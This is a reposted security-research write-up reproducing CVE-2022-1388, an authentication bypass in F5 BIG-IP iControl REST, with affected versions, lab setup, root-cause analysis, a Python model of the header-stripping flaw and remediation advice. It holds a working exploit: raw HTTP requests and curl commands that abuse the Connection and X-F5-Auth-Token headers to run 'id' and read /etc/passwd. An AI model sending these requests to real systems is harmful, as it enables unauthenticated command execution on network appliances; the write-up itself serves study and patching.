CVE-2022-1388 BIG-IP iControl REST Vulnerability Reproduction

admin · 2022-05-12 23:34:37 · 183 views

CVE-2022-1388: BIG-IP iControl REST vulnerability


Impact

The F5 advisory (K23605346) describes the impact as follows:

Impact
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

In other words: an unauthenticated attacker who can reach the management port or a self IP address of a BIG-IP system can execute arbitrary system commands, create or delete files, and stop services. Only the control plane (management) is exposed; traffic handled by the data plane is not affected.
Product               Branch  Versions known to be vulnerable  Fixes introduced in  Severity  CVSSv3 score
BIG-IP (all modules)  17.x    None                             17.0.0               Critical  9.8
                      16.x    16.1.0 - 16.1.2                  16.1.2.2
                      15.x    15.1.0 - 15.1.5                  15.1.5.1
                      14.x    14.1.0 - 14.1.4                  14.1.4.6
                      13.x    13.1.0 - 13.1.4                  13.1.5
                      12.x    12.1.0 - 12.1.6                  no official patch
                      11.x    11.6.1 - 11.6.5                  no official patch



Reproduction


Download virtual machine images for four versions from the official site https://downloads.f5.com/esd/productlines.jsp and reproduce locally. Pick an OVA virtual machine package whose version lies within the affected range.


Once downloaded, double-click the image to import it, or import it from within your virtualisation software:



After the import completes, start the VM. You need its management IP address: log in on the VM console as root (default password: default) and run ifconfig mgmt to display it.


Then open https://<ip> in a browser; when the login page appears, capture the request with an intercepting proxy such as Burp (the curl commands below route through --proxy 127.0.0.1:8080 for this purpose).


The exploit, taken from https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html, is as follows:
# F5 BIG-IP RCE exploitation (CVE-2022-1388)

POST (1):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl commandliner (curl computes Content-Length from the body):

$ curl -i -s -k -X $'POST' \
  -H $'Host: <redacted>:8443' \
  -H $'Authorization: Basic YWRtaW46' \
  -H $'Connection: keep-alive, X-F5-Auth-Token' \
  -H $'X-F5-Auth-Token: 0' \
  --data-binary $'{"command": "run" , "utilCmdArgs": " -c \'id\' " }\x0d\x0a' \
  $'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080


POST (2):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'cat /etc/passwd' " }

curl commandliner:

$ curl -i -s -k -X $'POST' \
  -H $'Host: <redacted>:8443' \
  -H $'Authorization: Basic YWRtaW46' \
  -H $'Connection: keep-alive, X-F5-Auth-Token' \
  -H $'X-F5-Auth-Token: 0' \
  --data-binary $'{"command": "run" , "utilCmdArgs": " -c \'cat /etc/passwd\' " }\x0d\x0a\x0d\x0a' \
  $'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

The -k flag skips certificate verification because the appliance presents a self-signed certificate; the --proxy option routes the request through Burp on 127.0.0.1:8080 so it can be inspected and replayed.
Root cause: the request path behind /mgmt on BIG-IP has two tiers, an Apache httpd front end that handles authentication and proxies to the Jetty back end that implements iControl REST. The request above carries Authorization: Basic YWRtaW46, which is base64 for admin: (user admin, empty password), together with an X-F5-Auth-Token header, so the front end treats it as token-authenticated and does not check the password. Because the Connection header also names X-F5-Auth-Token, the front end treats that header as hop-by-hop and strips it before forwarding. The back end then receives a request with no token and a Basic credential naming a local user, assumes the front end has already verified it, and runs the command as admin. The hop-by-hop behaviour is described in:

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

In short, a request can nominate its own custom headers as hop-by-hop by listing them in the Connection header:

Connection: close, X-Foo, X-Bar

Here the proxy is asked to treat X-Foo and X-Bar as hop-by-hop, meaning it removes them from the request before passing it on (RFC 7230, section 6.1).

During reproduction we found that only on versions 14.x to 16.x does the request need Host: localhost for the bypass to work.
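
The mechanism described above, as a model added for this page. It is an illustration written for this page and not F5's code: the credential store, the issued-token set and the two decision functions are simplified and constructed, and the hardened variant models the Connection-rewrite approach rather than the appliance's actual configuration. It shows why the exploit needs both the X-F5-Auth-Token header and the Connection header that nominates it, and why rewriting Connection at the front end closes the hole.

```python
import base64

# Added model, written for this page, of the two-tier path behind /mgmt on
# BIG-IP: an httpd front end that proxies to the Jetty back end serving
# iControl REST. An illustration of the mechanism, not F5's code; the user and
# token tables are constructed.

LOCAL_USERS = {"admin": "correct-horse"}   # constructed credential store
VALID_TOKENS = {"7FAE3C1B9D2E"}            # constructed set of issued X-F5-Auth-Token values


def make_request(user, password, token=None, nominate_token=False, host="localhost"):
    """Raw iControl REST request in the shape used on this page."""
    creds = base64.b64encode(f"{user}:{password}".encode()).decode()
    connection = "keep-alive, X-F5-Auth-Token" if nominate_token else "keep-alive"
    lines = [
        "POST /mgmt/tm/util/bash HTTP/1.1",
        f"Host: {host}",
        f"Authorization: Basic {creds}",
        f"Connection: {connection}",
    ]
    if token is not None:
        lines.append(f"X-F5-Auth-Token: {token}")
    body = '{"command": "run", "utilCmdArgs": "-c \'id\'"}'
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_headers(raw):
    """Header block of a raw HTTP/1.1 request as a dict with lower-cased names."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def basic_credentials(headers):
    """(user, password) from a Basic Authorization header, or (None, None)."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None, None
    user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
    return user, password


def strip_hop_by_hop(headers):
    """RFC 7230 section 6.1 as a forwarding proxy applies it: every header named
    in Connection is hop-by-hop and is dropped, together with Connection itself."""
    forwarded = dict(headers)
    nominated = [h.strip().lower() for h in headers.get("connection", "").split(",")]
    for name in nominated + ["connection"]:
        forwarded.pop(name, None)
    return forwarded


def normalise_connection(headers):
    """Mitigation in the spirit of the httpd change in K23605346: rewrite Connection
    to a fixed value before forwarding, so a client cannot nominate extra headers."""
    fixed = dict(headers)
    wants_keepalive = "keep-alive" in headers.get("connection", "").lower()
    fixed["connection"] = "keep-alive" if wants_keepalive else "close"
    return fixed


def front_end(headers, hardened=False):
    """Front-end decision. A request carrying X-F5-Auth-Token is handed to the back
    end for token validation; any other request must present a correct password."""
    if hardened:
        headers = normalise_connection(headers)
    if "x-f5-auth-token" not in headers:
        user, password = basic_credentials(headers)
        if user is None or LOCAL_USERS.get(user) != password:
            return None                      # 401 issued by the front end
    return strip_hop_by_hop(headers)


def back_end(headers):
    """Back-end decision. With a token it validates the token; with no token it
    assumes the front end already checked the password and trusts the user name."""
    if headers is None:
        return False
    token = headers.get("x-f5-auth-token")
    if token is not None:
        return token in VALID_TOKENS
    user, _ = basic_credentials(headers)
    return user in LOCAL_USERS


def request_allowed(raw_request, hardened=False):
    """True if the request reaches util/bash as an authenticated admin."""
    return back_end(front_end(parse_headers(raw_request), hardened=hardened))


EXPLOIT = make_request("admin", "", token="0", nominate_token=True)
```

In the vulnerable path the bogus token makes the front end skip the password check, the Connection header makes it drop the token, and the back end trusts the bare user name. With the Connection header normalised, the token reaches the back end, fails validation, and the request is rejected; a request that simply omits the token is stopped by the front end's password check.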



Remediation


Upgrade to a fixed version, or follow the Recommended Actions in the official article: https://support.f5.com/csp/article/K23605346
Until an upgrade is possible, the following steps mitigate the attack on affected versions:
Block iControl REST access through self IP addresses
Block iControl REST access through the management interface
Modify the BIG-IP httpd configuration (the published change rewrites the Connection request header to a fixed close/keep-alive value, so a client can no longer nominate X-F5-Auth-Token as hop-by-hop)

References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
https://support.f5.com/csp/article/K23605346
https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html
https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

Originally published on the WeChat public account 山石网科安全技术研究院: CVE-2022-1388 BIG-IP iControl REST 漏洞复现

Posted by admin on 2022-05-12 23:34:37. Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): http://cn-sec.com/archives/998072.html
